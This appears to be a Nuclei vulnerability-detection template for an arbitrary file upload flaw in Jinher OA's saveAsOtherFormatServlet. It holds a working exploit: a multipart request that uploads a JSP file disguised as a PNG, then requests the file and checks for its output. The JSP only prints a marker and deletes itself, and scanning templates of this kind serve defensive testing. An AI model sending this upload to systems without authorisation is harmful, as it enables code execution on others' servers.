id: jinher-oa-saveasotherformatservlet-fileupload

info:
  name: 金和OA saveAsOtherFormatServlet 任意文件上传
  author: SleepingBag945
  severity: critical


variables:
  filename: "{{to_lower(rand_base(4))}}"
  rboundary: "{{to_lower(rand_base(32))}}"

http:
  - raw:
      - |
        POST /jc6/servlet/saveAsOtherFormatServlet?fileName={{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Content-Type: multipart/form-data; boundary=---------------------------{{rboundary}}
        Cookie: Secure
        Upgrade-Insecure-Requests: 1


        -----------------------------{{rboundary}}
        Content-Disposition: form-data; name="FileBlod";filename="1.jsp"
        Content-Type: image/png

        <% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        -----------------------------{{rboundary}}--

      - |
        GET /jc6/upload/gwzw/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Upgrade-Insecure-Requests: 1

    matchers-condition: and
    matchers:
      - type: dsl 
        dsl:
          - 'status_code_2 == 200 && contains((body_2),"12321")'
        condition: and
